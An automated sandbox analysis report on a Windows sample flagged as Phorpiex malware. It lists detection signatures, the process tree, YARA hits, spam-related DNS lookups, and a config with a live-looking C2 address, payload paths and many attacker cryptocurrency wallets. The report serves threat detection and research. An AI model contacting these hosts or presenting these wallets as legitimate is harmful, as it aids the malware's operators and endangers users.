Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l3Qj8QhTYZ.exe

Overview

General Information

Sample Name:l3Qj8QhTYZ.exe
Analysis ID:765636
MD5:042c4da66dda2cab43007457e1e81a76
SHA1:ed9bb523da72781c26f46ee1464f1e5fc1283c4a
SHA256:48214f32e63f85fe88aff17257a746862d7530bce20b2dfc7a7b942743374a31
Tags:exePhorpiex
Infos:

Detection

Phorpiex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Phorpiex
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Contains functionality to determine the online IP of the system
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
May check the online IP address of the machine
Send many emails (e-Mail Spam)
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to resolve many domain names, but no domain seems valid
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Contains functionality to check if Internet connection is working
Uses 32bit PE files
Yara signature match
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Connects to many different domains
Contains long sleeps (>= 3 min)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Drops PE files to the user directory
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • l3Qj8QhTYZ.exe (PID: 6012 cmdline: C:\Users\user\Desktop\l3Qj8QhTYZ.exe MD5: 042C4DA66DDA2CAB43007457E1E81A76)
    • sysfevcs.exe (PID: 6120 cmdline: C:\Windows\sysfevcs.exe MD5: 042C4DA66DDA2CAB43007457E1E81A76)
      • 2350331867.exe (PID: 1276 cmdline: C:\Users\user\AppData\Local\Temp\2350331867.exe MD5: ACAD915C5FC6C177940F8ED644E4FF76)
      • 2676917645.exe (PID: 7920 cmdline: C:\Users\user\AppData\Local\Temp\2676917645.exe MD5: 042C4DA66DDA2CAB43007457E1E81A76)
        • sysfevcs.exe (PID: 2088 cmdline: C:\Users\user\sysfevcs.exe MD5: 042C4DA66DDA2CAB43007457E1E81A76)
  • sysfevcs.exe (PID: 4764 cmdline: "C:\Windows\sysfevcs.exe" MD5: 042C4DA66DDA2CAB43007457E1E81A76)
  • cleanup
{"C2 url": "http://185.215.113.66/", "Wallet": ["12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc", "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD", "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg", "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz", "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop", "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8", "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG", "0xb899fC445a1b61Cdd62266795193203aa72351fE", "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7", "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1", "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5", "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy", "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3", "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L", "hxc65003fbd738014cf286edf92f9ddac689ec4de5", "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6", "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi", "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI", "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX", "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs", "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev", "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe", "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny", "43ABGVDKXksdy7UTP8aHqkRf4xAVDmKKXBYDRevAadwaLJhHzH4ubZHGLjVpLc5ZWk7TVmHbHHAWUBF78mx1YG4eNbww6fr", "8BxS6BtEznQUg2ThyjoKsgNzBLQiW43wJ7FMedwb8P29YKiPvrD6PWrSMcAaRjMnXkhnYjgj8dX9hcL2DRejE4vR6oLP2ou", "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt", "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm", "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL", "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY", "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg", "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky", "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945", "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v"]}
SourceRuleDescriptionAuthorStrings
l3Qj8QhTYZ.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\2350331867.exeSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
    • 0x2084:$s1: http://
    • 0x2e2c:$s1: \xB0\xAC\xAC\xA8\xE2\xF7\xF7
    • 0x2084:$f1: http://
    C:\Users\user\AppData\Local\Temp\2676917645.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Windows\sysfevcs.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        C:\Users\user\sysfevcs.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
            00000010.00000002.518234685.000000000040F000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000001.00000000.260711622.000000000040F000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                0000000F.00000002.507786324.000000000040F000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  00000000.00000003.262918293.00000000005B6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    Click to see the 13 entries
                    SourceRuleDescriptionAuthorStrings
                    15.2.2676917645.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      1.0.sysfevcs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        0.2.l3Qj8QhTYZ.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          1.2.sysfevcs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            15.0.2676917645.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                              Click to see the 5 entries
                              No Sigma rule has matched
                              No Snort rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: l3Qj8QhTYZ.exeReversingLabs: Detection: 84%
                              Source: l3Qj8QhTYZ.exeVirustotal: Detection: 61%Perma Link
                              Source: l3Qj8QhTYZ.exeAvira: detected
                              Source: http://185.215.113.66/5Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/3Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/5-586C90B09FEFAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/1wAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/pol/n.txtAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/pol/608.txtAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4aAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/1jAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/1CAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/3jAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/2NAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/2Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/1ZAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/1kAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/getntbupuAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/pol/http://185.215.113.66/pol/n.txtAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/2WAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4XAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/1Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/getntbupAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/getntbup:Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/ED-4BF2-83AB-37B7B86E58B0Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/getntbuprAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/3aAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/5jAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4LMEM0Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/2EAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4PoAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/1NAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4ystem32Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4/Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/pol/Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/3ystem32Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/5858874sysfevcs.exeWindowsAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/43Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/4sAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/2tAvira URL Cloud: Label: malware
                              Source: http://185.215.113.66/47Avira URL Cloud: Label: malware
                              Source: http://185.215.113.66/Avira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeAvira: detection malicious, Label: HEUR/AGEN.1237550
                              Source: C:\Users\user\sysfevcs.exeAvira: detection malicious, Label: HEUR/AGEN.1237550
                              Source: C:\Windows\sysfevcs.exeAvira: detection malicious, Label: HEUR/AGEN.1237550
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeReversingLabs: Detection: 84%
                              Source: C:\Users\user\sysfevcs.exeReversingLabs: Detection: 84%
                              Source: C:\Windows\sysfevcs.exeReversingLabs: Detection: 84%
                              Source: l3Qj8QhTYZ.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\2676917645.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\sysfevcs.exeJoe Sandbox ML: detected
                              Source: C:\Windows\sysfevcs.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeJoe Sandbox ML: detected
                              Source: 16.0.sysfevcs.exe.400000.0.unpackMalware Configuration Extractor: Phorpiex {"C2 url": "http://185.215.113.66/", "Wallet": ["12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc", "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD", "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg", "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz", "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop", "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8", "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG", "0xb899fC445a1b61Cdd62266795193203aa72351fE", "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7", "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1", "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5", "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy", "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3", "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L", "hxc65003fbd738014cf286edf92f9ddac689ec4de5", "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6", "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi", "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI", "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX", "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs", "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev", "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe", "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k", "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny", "43ABGVDKXksdy7UTP8aHqkRf4xAVDmKKXBYDRevAadwaLJhHzH4ubZHGLjVpLc5ZWk7TVmHbHHAWUBF78mx1YG4eNbww6fr", "8BxS6BtEznQUg2ThyjoKsgNzBLQiW43wJ7FMedwb8P29YKiPvrD6PWrSMcAaRjMnXkhnYjgj8dX9hcL2DRejE4vR6oLP2ou", "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt", "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm", "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL", "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY", "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg", "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky", "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945", "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v"]}
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_0040A590 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,0_2_0040A590
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_0040A590 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_0040A590
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_0040A590 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_0040A590

                              Phishing

                              barindex
                              Source: Yara matchFile source: l3Qj8QhTYZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 15.2.2676917645.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.l3Qj8QhTYZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.0.2676917645.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 16.0.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 16.2.sysfevcs.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.l3Qj8QhTYZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000010.00000002.518234685.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.260711622.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.507786324.000000000040F000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.262918293.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000000.482216563.000000000040F000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000003.507495356.0000000000566000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.251631749.000000000040F000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000010.00000000.505235810.000000000040F000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.279876335.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.485944774.0000000004610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: l3Qj8QhTYZ.exe PID: 6012, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 6120, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 4764, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 2676917645.exe PID: 7920, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: sysfevcs.exe PID: 2088, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2676917645.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\sysfevcs.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\sysfevcs.exe, type: DROPPED
                              Source: l3Qj8QhTYZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00404CF0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00404CF0
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00404BB0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00404BB0
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_00404CF0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_00404CF0
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_00404BB0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00404BB0
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_00404CF0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_00404CF0
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_00404BB0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00404BB0

                              Networking

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeCode function: 12_2_009017D0 InternetOpenA,InternetOpenUrlA,InternetReadFile,wsprintfA,wsprintfA,InternetCloseHandle,wsprintfA,InternetCloseHandle, http://icanhazip.com/12_2_009017D0
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeDNS query: name: icanhazip.com
                              Source: C:\Users\user\AppData\Local\Temp\2350331867.exeDNS query: name: icanhazip.com
                              Source: unknownDNS traffic detected: query: edu.eq.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: centrum.sk.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: ep.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: stjohnbosco.adl.catholic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: bsharpaccounts.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: designacademy.edu.au replaycode: Server failure (2)
                              Source: unknownDNS traffic detected: query: vsapinconsulting.com.au replaycode: Server failure (2)
                              Source: unknownDNS traffic detected: query: bmcl.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: wangaratta-high.vic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: academyroofing.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: westwindroofing.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: akoqi.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: explosivestraining.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: bruhn.id.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: aqis.gov.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: smh.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: veritel.com.au replaycode: Server failure (2)
                              Source: unknownDNS traffic detected: query: whiteminx.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: echowebhosting.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: stmaryscoll.adl.catholic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: newyearsparty.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: colaccollege.vic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: vantex.com.au replaycode: Server failure (2)
                              Source: unknownDNS traffic detected: query: midland.autotrader.co.uk replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: sttherese.catholic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: turncoatstudios.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: brigidine.nsw.edu.au493394047487887 replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: evandavis.id.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: petalproductions.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: mail.donvale.vic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: jaze.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: stprsuns.melb.catholic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: assetbacked.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: ad2-one.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: dialm.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: cos.tas.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: iird.vic.gov.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: cap.tas.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: dalsegnostudios.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: yhoo.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: edu.nsw.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: rosehillcrest.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: yahoo.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: templetonknight.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: beaconhills.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: oic.nsw.gov.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: scolelwd.melb.catholic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: mail.austria.com replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: acsmail.net.au replaycode: Server failure (2)
                              Source: unknownDNS traffic detected: query: stmyalt.melb.catholic.edu.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: surtek.com.au replaycode: Name error (3)
                              Source: unknownDNS traffic detected: query: hiotmail.com.au replaycode: Name error (3)
                              Source: C:\Users\user\Desktop\l3Qj8QhTYZ.exeCode function: 0_2_00409260 htons,socket,connect,getsockname, www.update.microsoft.com0_2_00409260
                              Source: C:\Windows\sysfevcs.exeCode function: 1_2_00409260 htons,socket,connect,getsockname, www.update.microsoft.com1_2_00409260
                              Source: C:\Windows\sysfevcs.exeCode function: 2_2_00409260 htons,socket,connect,getsockname, www.update.microsoft.com2_2_00409260
                              Source: Joe Sandbox ViewIP Address: 217.69.139.150 217.69.139.150
                              Source: unknownNetwork traffic detected: DNS query count 531
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: icanhazip.com
                              Source: global trafficHTTP traffic detected: GET /pol/n.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /pol/608.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36Host: 185.215.113.66
